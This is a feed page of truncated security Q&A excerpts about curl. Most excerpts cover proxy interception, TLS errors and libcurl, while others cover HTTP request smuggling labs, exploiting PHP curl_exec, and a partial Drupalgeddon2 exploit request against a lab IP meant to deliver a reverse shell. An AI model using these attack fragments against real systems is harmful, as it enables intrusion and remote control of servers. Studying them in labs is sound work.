Collaborate Disseminate
I use Burp Suite as proxy listen 127.0.0.1:8080,
and I also set the HTTP Proxy as 127.0.0.1:8080.
now Burp Suite can intercept all the browsers(eg. firefox, safari, chrome), and application(eg. dictionary ) on my Mac:
but can not interce… Continue reading Burp Suite can not intercept the wget and curl HTTP request
I am trying to run wfuzz to match the curl command which works, I know valid credentials but it doesn’t seem send exact same request as curl even that the following flags are matching wfuzz documentation.
wfuzz -c -w user -w pass -b “ses… Continue reading curl to wfuzz translation [closed]
On my Mac, HTTPS connnections to certain sites fail using the built-in curl binary of macOS 10.14. They work fine with different browsers, as well as other builds of cURL on the same system. One of the affected sites is https://kapeli.com/… Continue reading HTTPS connection to specific sites fail with cURL on macOS
According to my CloudFlare firewall logs, somebody went through each of my subdomains. My website is not advertised, it doesn’t even show on Google unless typing the exact domain name into it. I think I know where they found it listed, tho… Continue reading Seems my CNAMEs got "curled". Somebody please explain this to me
Lately I have been attempting Portswiggers WebSecAcademy’s HTTP request smuggling labs with the additional challenge of writing a python script to complete the challenge for me.
Intended solution from Burp Repeater:
POST / HTTP/1.1
Host:… Continue reading Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling
I am trying to connect to an IP address and port using netcat. Before connecting, it prompts me for a password. I do know the password, but when I type it and hit enter, it prompts me for the password again! I have also tried using teln… Continue reading Bypass login screen connecting to IP and port [closed]
I have been working on a project and I wonder if it’s possible to exploit curl_exec function while in PHP.
Scenario:
I have the PHP script that checks a domain for me, but the curl is not secured, can it be exploited via the request, ex:… Continue reading Is it possible to exploit php curl?
I was going to post this on a different SE site, but I found that explicitly stating –tlsv1.1 to curl fixed the problem, for now. My question now relates to security.
A vendor switched to FTPS (not SSH FTP) recently. I’ve added –ssl a… Continue reading Linux curl SH script broken unless I specify TLS version
I’m trying to use the Drupalgeddon2 exploit (https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708) on drupal 7.57 ubuntu machine.
the requests:
-curl -k -s ‘http://192.168.204.141/?q=user/password&name[%23post_render][]=p… Continue reading Sending a reverse shell command through the drupalgeddon vulnerability isn’t working
I use the C libcurl library.
I need to do OCSP stapling combined with mutual authentication. For that, I’ll take model on the below exemples. However, I need the private key of my client certificate to be stored in the TPM chip. Do you kn… Continue reading libcurl: how to use TPM private key for mutual SSL authentication